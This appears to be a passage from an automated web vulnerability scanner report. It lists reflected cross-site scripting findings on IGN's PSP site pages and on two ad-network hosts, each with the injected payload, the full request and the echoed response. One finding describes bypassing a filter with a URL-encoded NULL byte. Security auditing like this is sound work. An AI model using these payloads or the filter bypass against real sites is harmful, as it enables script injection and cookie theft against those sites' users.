GET /index/games.html?f3e46"-alert(1)-"b63af14015c=1 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>All PSP & PSPgo Ga ...[SNIP]... (typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://psp.ign.com/index/games.html?f3e46"-alert(1)-"b63af14015c=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.411. http://psp.ign.com/index/games.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://psp.ign.com
Path:
/index/games.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c3d0"><script>alert(1)</script>b2baf9ee6f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/games.html?7c3d0"><script>alert(1)</script>b2baf9ee6f7=1 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>All PSP & PSPgo Ga ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://psp.ign.com/index/games.html?7c3d0"><script>alert(1)</script>b2baf9ee6f7=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.412. http://psp.ign.com/index/images.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://psp.ign.com
Path:
/index/images.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4599"><script>alert(1)</script>8a9c4fe026a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/images.html?d4599"><script>alert(1)</script>8a9c4fe026a=1 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.413. http://psp.ign.com/index/images.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://psp.ign.com
Path:
/index/images.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5272"-alert(1)-"ce15808ee67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/images.html?b5272"-alert(1)-"ce15808ee67=1 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN PSP: Games, Ch ...[SNIP]... typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://psp.ign.com/index/images.html?b5272"-alert(1)-"ce15808ee67=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.414. http://psp.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://psp.ign.com
Path:
/index/latest-updates.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2003"><script>alert(1)</script>c94d896fd69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/latest-updates.html?e2003"><script>alert(1)</script>c94d896fd69=1 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://psp.ign.com/index/latest-updates.html?e2003"><script>alert(1)</script>c94d896fd69=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.415. http://psp.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://psp.ign.com
Path:
/index/latest-updates.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cccd9"-alert(1)-"8f516ee96e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/latest-updates.html?cccd9"-alert(1)-"8f516ee96e5=1 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the types request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6631"><script>alert(1)</script>d6cd819c055 was submitted in the types parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/latest-updates.html?types=allc6631"><script>alert(1)</script>d6cd819c055 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the types request parameter is copied into an HTML comment. The payload 2ac4f--><script>alert(1)</script>639feac8e77 was submitted in the types parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /index/latest-updates.html?types=all2ac4f--><script>alert(1)</script>639feac8e77 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the types request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d2a7"-alert(1)-"f3c74b87739 was submitted in the types parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/latest-updates.html?types=all8d2a7"-alert(1)-"f3c74b87739 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... uard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://psp.ign.com/index/latest-updates.html?types=all8d2a7"-alert(1)-"f3c74b87739", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.419. http://psp.ign.com/index/news.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://psp.ign.com
Path:
/index/news.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62ace"><script>alert(1)</script>34afae532c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/news.html?62ace"><script>alert(1)</script>34afae532c7=1 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.420. http://psp.ign.com/index/news.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://psp.ign.com
Path:
/index/news.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 527a1"-alert(1)-"690d68b5a97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/news.html?527a1"-alert(1)-"690d68b5a97=1 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN PSP: Games, Ch ...[SNIP]... f(typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://psp.ign.com/index/news.html?527a1"-alert(1)-"690d68b5a97=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.421. http://psp.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://psp.ign.com
Path:
/index/previews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8a5e"-alert(1)-"1d4cea38ea6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/previews.html?f8a5e"-alert(1)-"1d4cea38ea6=1 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN PSP: Games, Ch ...[SNIP]... peof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://psp.ign.com/index/previews.html?f8a5e"-alert(1)-"1d4cea38ea6=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.422. http://psp.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://psp.ign.com
Path:
/index/previews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4aa34"><script>alert(1)</script>fd35f539c83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/previews.html?4aa34"><script>alert(1)</script>fd35f539c83=1 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.423. http://psp.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://psp.ign.com
Path:
/index/reviews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99f6c"><script>alert(1)</script>5ee11b38c47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/reviews.html?99f6c"><script>alert(1)</script>5ee11b38c47=1 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>New PSP & PSPgo Re ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://psp.ign.com/index/reviews.html?99f6c"><script>alert(1)</script>5ee11b38c47=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.424. http://psp.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://psp.ign.com
Path:
/index/reviews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6d42"-alert(1)-"27e5919a050 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/reviews.html?c6d42"-alert(1)-"27e5919a050=1 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>New PSP & PSPgo Re ...[SNIP]... ypeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://psp.ign.com/index/reviews.html?c6d42"-alert(1)-"27e5919a050=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.425. http://psp.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://psp.ign.com
Path:
/index/upcoming.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 517d6"><script>alert(1)</script>c4ae9d343d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/upcoming.html?517d6"><script>alert(1)</script>c4ae9d343d6=1 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>New PSP & PSPgo Ga ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://psp.ign.com/index/upcoming.html?517d6"><script>alert(1)</script>c4ae9d343d6=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.426. http://psp.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://psp.ign.com
Path:
/index/upcoming.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9e7b"-alert(1)-"897d70d61ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/upcoming.html?f9e7b"-alert(1)-"897d70d61ed=1 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>New PSP & PSPgo Ga ...[SNIP]... peof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://psp.ign.com/index/upcoming.html?f9e7b"-alert(1)-"897d70d61ed=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.427. http://psp.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://psp.ign.com
Path:
/index/videos.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1904"><script>alert(1)</script>dd3f646c8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/videos.html?b1904"><script>alert(1)</script>dd3f646c8a=1 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.428. http://psp.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://psp.ign.com
Path:
/index/videos.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a8f9"-alert(1)-"5bad9daa72d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/videos.html?5a8f9"-alert(1)-"5bad9daa72d=1 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN PSP: Games, Ch ...[SNIP]... typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://psp.ign.com/index/videos.html?5a8f9"-alert(1)-"5bad9daa72d=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.429. http://psp.ign.com/objects/027/027595.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://psp.ign.com
Path:
/objects/027/027595.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80539"-alert(1)-"702b4d47499 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /objects/027/027595.html?80539"-alert(1)-"702b4d47499=1 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN: Pac-Man: Cham ...[SNIP]... _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://psp.ign.com/objects/027/027595.html?80539"-alert(1)-"702b4d47499=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.430. http://psp.ign.com/objects/027/027595.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://psp.ign.com
Path:
/objects/027/027595.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cb60"><script>alert(1)</script>ddcfe001da7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /objects/027/027595.html?1cb60"><script>alert(1)</script>ddcfe001da7=1 HTTP/1.1 Host: psp.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload a7925<script>alert(1)</script>2ab1d78d3c6 was submitted in the slotname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gampad/ads?correlator=1297045506437&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-6817975146191503&slotname=TheChive_300x250_HPa7925<script>alert(1)</script>2ab1d78d3c6&page_slots=TheChive_300x250_HP&cookie_enabled=1&ga_vid=548067397.1297045520&ga_sid=1297045520&ga_hid=981265322&url=http%3A%2F%2Fthechive.com%2F%3Fign105ab01%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E958cbd566d4&ref=http%3A%2F%2Fburp%2Fshow%2F20&lmt=1297067119&dt=1297045519684&cc=10&biw=985&bih=1031&ifi=1&adk=2277017155&u_tz=-360&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103 HTTP/1.1 Host: pubads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://thechive.com/?ign105ab01%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E958cbd566d4 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Mon, 07 Feb 2011 02:26:23 GMT Server: gfp-be Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 2749
GA_googleSetAdContentsBySlotForSync({"TheChive_300x250_HPa7925<script>alert(1)</script>2ab1d78d3c6":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f ...[SNIP]...
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecfd1"><script>alert(1)</script>5216b920dbc was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=ecfd1"><script>alert(1)</script>5216b920dbc&sp=y&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://www30a2.glam.com/gad/glamadapt_srv.act?;ga_output=html;ga_exadvids=50000417,50001916,2457154;ga_exadids=5000025383;_ge_=6^2^cba0523816c7edc43ac471afdf2dd34b;ga_adb=ade;sid=112351129691745689711;browser=2;co=US;dma=511;;;;flg=66;;zone=/;nt=b;cc=us;aft=p;ec=ron;p=0;p=1;!c=1;!c=nptr;ec=taut;ec=te;ec=teb;ec=tgt;ec=tls;ec=ttec;ia=pc;pec=be;rmt=exp;rmt=ov;rsk=y;rtbp=1;vads=test;vec=blif;vec=sp;vpec=blif;bt=nbt;atf=u;pfl=0;dt=s;!c=hagl;!c=hagn;afid=420105803;dsid=796794;uv=2;;tt=i;u=b00210076z51mac2ab9,f0fu2sa,g10001u;sz=300x250;tile=1;ord=2439329240005463.5;;afid=420105803;dsid=796794;url=ydn23y;seq=1;ux=f-fu2sa,tid-1,pid-0076z51mac2ab9,aid-2,g-66,1,;_glt=360:0:20:25:22:973:2011:2:6;a_tz=-360;_g_cv=2;;;dt=s;!c=hagl;!c=hagn;;lbt=nbt;sbt=eh;sbt=rl;sbt=ru; Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adImpCount=FM4QLcaMabkQsarcOBMTT_qd1v3GGeBcoJK0MOl0KG-Y481wEkFtGX7HudJA1SwJY9n9GIWJHDTqbWbTuEexfNzeQdD3uMEbsSJGoH6nZcvCzn_rbeUw4N91a2HFDwx7Wl6PMIbl8VoYkne2SJkXTcTcqhcYEXFRrx1COjt-xQdPBFgEFn33aBMbAqV_0XEIioGKZSAftgkVYZTzRayYVmmTJdkIn7237siDdt9MzJqJi5T6FYiHf9o35IlREqTNFveKpsZQ30qpNKi15RJt04BNhaXhDlSq6EvznmypgJEkna5GLuKLpEu7eZEeTMi7F6sK_rp2soXzwueUGRFartfze4TUjaNUIXjW8HpTdIXW8uxzXCZHw_1hR9tJint6dsPDEFhRxd_Mub3GEI1LN-tHiIt90vCIZrFIVkRcrTHWSuqW6r5ZIwUtscKD_QT9RhXOUlzX0--TPsid5EqGlKaR8fzj-CgEMyGy4iMXI1WxKbXh9CKgY6S3LP_zmj75AgqPmyW7n-K57XLwzviwi0UeS0QSNHqXIchkIsQCETGT3yD6yFHAIahzcKETB33UwCPq2GhFCxYySztyqVkKk9fqbN4-YU4FEz0wwkD5vsFOGK_87tDq8e92tNo34emrEgGEUj-NO1cCBiKRN0KNH1ftcOyrV1OLoU5x9aMp-92fSDdx8Pm4E6I95eyuD_EIQOJmu9RYL7YOIJ6DsZdIlrLgwokXGxtO8_jRpe316oYDuH7CMSEB_S7o6Xm3tvDBfH77IJVG0N6dycTdcjtOKF0Cz2TbSViJ-oT4nVLBUOQ7zE-OOnjPRQ6BZXJCY0oCMrkBfNspHfysXvb7GqOmGNAITbT7Z6AmMx12CVhoBV8PCKPJoslzeIPsOadDQ5GApTHEeUcb_20FLCe61hOZos4ND7pDMbh_Nz4asivfvnRRu_fmnuOn7vvqoBU15Zmhn2aVSJry2cIXXaBci8YswRWnz3-1lFmH8NpHbFKrPy3hBObtf8ALhKpons6mVN9Ng_E4yJzpnqztVh_CB-KMHlM4At-mEES-WC-9xjj3t3cnzJw50Wq6BglWv58k-98YkSbTm3kPOUdWBiWoLi0oN0AgeHAdeFjGHSfjDkMzE5p5e_oJDB2Um-liToPNlmN15FjrbRSBV8G9GwEg